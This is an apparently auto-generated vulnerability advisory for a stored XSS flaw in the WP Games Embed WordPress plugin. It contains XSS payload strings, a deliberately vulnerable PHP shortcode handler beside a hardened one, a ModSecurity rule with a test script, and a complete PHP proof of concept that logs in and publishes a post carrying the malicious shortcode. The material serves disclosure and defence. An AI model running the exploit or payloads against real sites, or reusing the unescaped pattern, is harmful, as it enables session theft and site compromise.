Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 28, 2026

CVE-2026-3996: WP Games Embed <= 0.1beta – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (wp-games-embed)

CVE ID: CVE-2026-3996
Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 0.1beta
Patched Version:
Disclosed: March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3996 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the WP Games Embed WordPress plugin, version 0.1beta. The vulnerability resides in the plugin’s [game] shortcode handler, which fails to properly sanitize or escape user-supplied attribute values before outputting them into HTML. Attackers with Contributor-level permissions or higher can inject malicious scripts that execute when a victim views a compromised post or page.

Atomic Edge research infers the root cause is improper neutralization of input during web page generation (CWE-79). The vulnerability description confirms that multiple shortcode attributes ('width', 'height', 'src', 'title', 'description', 'game_url', 'main', 'thumb') are directly concatenated into HTML output without escaping. This indicates the shortcode callback function likely uses `add_shortcode('game', ...)` and builds its output by insecurely interpolating user-controlled `$atts` array values into an HTML string, bypassing standard WordPress sanitization functions like `esc_attr()` or `esc_url()`.

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker creates or edits a post, embedding the [game] shortcode with malicious JavaScript payloads within its attributes. For example, an attacker could craft a shortcode like [game title='alert(document.domain)' src='javascript:alert(1)']. When the post is saved and subsequently viewed by any user, the unsanitized attribute values render as raw HTML, executing the embedded scripts in the victim's browser context.

Remediation requires implementing proper output escaping on all user-controlled shortcode attributes before they are echoed. The plugin should use WordPress core escaping functions: `esc_attr()` for HTML attributes, `esc_url()` for URL attributes, and `wp_kses_post()` or `esc_html()` for text content. A secure patch would wrap each attribute output in the appropriate escaping function within the shortcode handler’s return statement.
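The following is an added example, not code from the WP Games Embed plugin: a reconstruction of the shortcode pattern the analysis above infers (raw `$atts` values interpolated into HTML) placed beside a hardened handler that applies the escaping functions the remediation paragraph names. The attribute names come from the advisory; the HTML layout, the `wge_` function names and the `function_exists()` fallbacks (which only exist so the file can be run from the command line outside WordPress) are assumptions.

```php
<?php
// Added example (not the plugin's code): vulnerable pattern inferred from the
// advisory next to a hardened [game] shortcode handler. The wge_ names and the
// markup layout are assumed; attribute names are the ones the advisory lists.

// Fallbacks so the file also runs outside WordPress (php game-shortcode.php).
// Inside WordPress these functions already exist and the real ones are used.
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('esc_url')) {
    // Stand-in for WordPress esc_url(): keep only http/https and escape for attribute context.
    function esc_url($url) {
        $url = trim((string) $url);
        return preg_match('#^https?://#i', $url) ? htmlspecialchars($url, ENT_QUOTES, 'UTF-8') : '';
    }
}
if (!function_exists('shortcode_atts')) {
    function shortcode_atts(array $pairs, $atts) {
        $atts = (array) $atts;
        $out  = [];
        foreach ($pairs as $name => $default) {
            $out[$name] = array_key_exists($name, $atts) ? $atts[$name] : $default;
        }
        return $out;
    }
}
if (!function_exists('add_shortcode')) {
    function add_shortcode($tag, $callback) {} // no-op outside WordPress
}

const WGE_DEFAULTS = [
    'src' => '', 'title' => '', 'description' => '',
    'width' => '640', 'height' => '480',
];

// VULNERABLE pattern (as inferred in the analysis): attribute values are written
// into the markup exactly as the post author typed them.
function wge_game_shortcode_vulnerable($atts) {
    $a = shortcode_atts(WGE_DEFAULTS, $atts);
    return "<div class=\"wge-game\" title=\"{$a['title']}\">"
         . "<iframe src=\"{$a['src']}\" width=\"{$a['width']}\" height=\"{$a['height']}\"></iframe>"
         . "<p>{$a['description']}</p></div>";
}

// HARDENED: every value is escaped for the context it lands in. Numeric
// attributes are coerced to integers instead of being trusted as strings.
function wge_game_shortcode_safe($atts) {
    $a      = shortcode_atts(WGE_DEFAULTS, $atts);
    $width  = max(1, (int) $a['width']);
    $height = max(1, (int) $a['height']);
    return '<div class="wge-game" title="' . esc_attr($a['title']) . '">'
         . '<iframe src="' . esc_url($a['src']) . '" width="' . $width . '" height="' . $height . '"></iframe>'
         . '<p>' . esc_html($a['description']) . '</p></div>';
}

add_shortcode('game', 'wge_game_shortcode_safe');

// Constructed attribute values mirroring the payload shapes quoted in the analysis.
$atts = [
    'title'       => '"><img src=x onerror=alert(1)>',
    'src'         => 'javascript:alert(1)',
    'description' => '<script>alert(1)</script>',
    'width'       => '300" onload="alert(1)',
    'height'      => '200',
];
echo "VULNERABLE:\n", wge_game_shortcode_vulnerable($atts), "\n\n";
echo "HARDENED:\n",   wge_game_shortcode_safe($atts), "\n";
```

In a real plugin only the two handlers and the `add_shortcode()` call belong in the plugin file. Note why `esc_url()` rather than `esc_attr()` is the right call for `src`, `game_url`, `main` and `thumb`: WordPress's `esc_url()` rejects schemes outside its allowed-protocol list, so a `javascript:` value is dropped rather than merely quoted, which `esc_attr()` alone would not do.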

The impact of successful exploitation includes session hijacking, unauthorized actions performed on behalf of authenticated users, defacement, and theft of sensitive data like cookies or session tokens. Since the XSS is stored, a single injection can affect all users who view the compromised page. The CVSS vector indicates scope change (S:C), meaning the vulnerability can impact components outside the plugin’s security authority.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-3996 (metadata-based)
# This rule blocks exploitation attempts targeting the vulnerable [game] shortcode attributes.
# It matches POST requests to the WordPress post editor where the content contains
# the [game] shortcode with dangerous attribute patterns indicative of XSS payloads.
# Note: it inspects the classic editor's form field (ARGS_POST:content). Posts saved
# through the block editor are sent to the REST API (/wp-json/wp/v2/posts) as JSON
# and are not covered by this rule.
SecRule REQUEST_URI "@rx /wp-admin/(post\.php|post-new\.php)$" \
  "id:20263996,phase:2,deny,status:403,chain,msg:'CVE-2026-3996: WP Games Embed Stored XSS via [game] shortcode',severity:'CRITICAL',tag:'CVE-2026-3996',tag:'WordPress',tag:'Plugin:wp-games-embed',tag:'Attack:XSS'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule ARGS_POST:content "@rx \[game[^]]*?\b(title|description|width|height|src|game_url|main|thumb)\s*=\s*['\"]?[^>\s]*[<>\(][^>\s]*['\"]?" \
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E"
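The script below is an added example, not part of the Atomic Edge rule set: it replays the content regex from the rule above against constructed request bodies, with the rule's transformation chain (`t:urlDecodeUni`, `t:htmlEntityDecode`, `t:lowercase`) approximated in PHP, so the pattern can be checked offline before the rule is deployed. The sample bodies are constructed, and `urldecode()` is only an approximation of `t:urlDecodeUni` (it does not handle `%uXXXX` forms).

```php
<?php
// Added example (not part of the advisory): offline replay of the rule's
// ARGS_POST:content regex against constructed post bodies.

// The @rx operand from the rule, as a PCRE pattern.
const WGE_RULE_RX = '/\[game[^]]*?\b(title|description|width|height|src|game_url|main|thumb)\s*=\s*[\'"]?[^>\s]*[<>(][^>\s]*[\'"]?/';

// Approximation of t:urlDecodeUni,t:htmlEntityDecode,t:lowercase, applied in
// the same order as in the rule (transformations run before the operator).
function wge_transform(string $value): string {
    $value = urldecode($value);
    $value = html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return strtolower($value);
}

// True when the rule's regex would fire on this value of the "content" field.
function wge_rule_matches(string $content_field): bool {
    return preg_match(WGE_RULE_RX, wge_transform($content_field)) === 1;
}

// Constructed samples: two benign bodies, then payloads in plain, URL-encoded
// and HTML-entity-encoded form to show why the decoding transformations matter.
$samples = [
    'benign shortcode'       => "[game title='Pac Man' src='https://example.test/pac.html' width='300' height='200']",
    'plain text post'        => 'No shortcode here, just prose.',
    'payload in title'       => "[game title='<img src=x onerror=alert(1)>' width='300']",
    'url-encoded payload'    => '%5Bgame%20title%3D%27%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E%27%5D',
    'entity-encoded payload' => "[game src='javascript:alert&#40;1&#41;']",
];
foreach ($samples as $label => $body) {
    printf("%-24s %s\n", $label, wge_rule_matches($body) ? 'BLOCK' : 'pass');
}
```

The two benign samples should print `pass` and the three payload samples `BLOCK`. Because the regex keys on `<`, `>` or `(` inside an attribute value, a legitimate URL containing parentheses would also be blocked; anyone tuning the rule for a site whose game URLs look like that should add such a value to the samples and adjust the pattern.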

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3996 - WP Games Embed <= 0.1beta - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
/**
 * Proof of Concept for CVE-2026-3996.
 * Assumptions:
 * 1. The target site has WP Games Embed plugin version 0.1beta installed.
 * 2. Valid Contributor-level credentials are available.
 * 3. The plugin's [game] shortcode is active and unsanitized as described.
 * 4. The attacker can create/edit posts via standard WordPress mechanisms.
 */

$target_url = 'https://vulnerable-wordpress-site.com'; // CONFIGURE THIS
$username = 'contributor_user'; // CONFIGURE THIS
$password = 'contributor_pass'; // CONFIGURE THIS

// Payload: Basic XSS to demonstrate vulnerability via the 'title' attribute.
// Other vulnerable attributes include: width, height, src, description, game_url, main, thumb.
// The "\$" stops PHP from interpreting ${document.domain} as its own ${...} syntax
// inside this double-quoted string; the literal "${" reaches the browser.
$malicious_shortcode = "[game title='<img src=x onerror=alert(`Atomic_Edge_XSS_\${document.domain}`)>' description='test' width='300' height='200']";

$post_title = 'Test Post with Malicious Game Shortcode';
$post_content = "This post contains an embedded game shortcode with a malicious title attribute.\n\n{$malicious_shortcode}\n\nViewing this post will trigger the XSS payload.";

// Step 1: Authenticate and obtain WordPress nonce for post creation.
// CURLOPT_COOKIEJAR also enables the cookie engine, so the session cookie set
// here is sent on the later requests made with the same handle.
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => "{$target_url}/wp-login.php",
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => "{$target_url}/wp-admin/",
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);
$login_response = curl_exec($ch);

// Step 2: Fetch the 'create post' page to extract the nonce.
// CURLOPT_HTTPGET switches the reused handle back to GET and clears the POST body.
curl_setopt_array($ch, [
    CURLOPT_URL => "{$target_url}/wp-admin/post-new.php",
    CURLOPT_HTTPGET => true
]);
$post_new_page = curl_exec($ch);

// Extract nonce for adding a new post (WordPress uses _wpnonce or nonce fields).
$nonce = '';
if (preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $post_new_page, $matches)) {
    $nonce = $matches[1];
} else {
    die("Could not extract nonce. Authentication may have failed or page structure differs.\n");
}

// Step 3: Submit a new post containing the malicious shortcode.
$post_data = [
    'post_title' => $post_title,
    'content' => $post_content,
    'publish' => 'Publish', // Contributor posts require review; use 'Submit for Review' if needed.
    '_wpnonce' => $nonce,
    '_wp_http_referer' => "/wp-admin/post-new.php",
    'post_type' => 'post',
    'user_ID' => '2', // May need adjustment based on user ID.
    'action' => 'editpost',
    'meta-box-order-nonce' => $nonce,
    'closedpostboxesnonce' => $nonce
];

// CURLOPT_HEADER includes the response headers (of every hop when a redirect
// is followed) in the returned string, so the Location header can be read in step 4.
curl_setopt_array($ch, [
    CURLOPT_URL => "{$target_url}/wp-admin/post.php",
    CURLOPT_POST => true,
    CURLOPT_HEADER => true,
    CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$post_submit_response = curl_exec($ch);

// Step 4: Attempt to extract the new post URL from response or redirect.
if (preg_match('/Location:\s*(\S+)/i', $post_submit_response, $matches) || preg_match('/class="post-published"[^>]*href="([^"]+)/', $post_submit_response, $matches)) {
    $post_url = trim($matches[1]);
    echo "Potential exploit post created at: {$post_url}\n";
    echo "Visit this URL as any user to trigger the XSS payload in the 'title' attribute.\n";
} else {
    echo "Post submission response received. Check the site's posts for '{$post_title}'.\n";
}

curl_close($ch);
unlink('cookies.txt');
?>
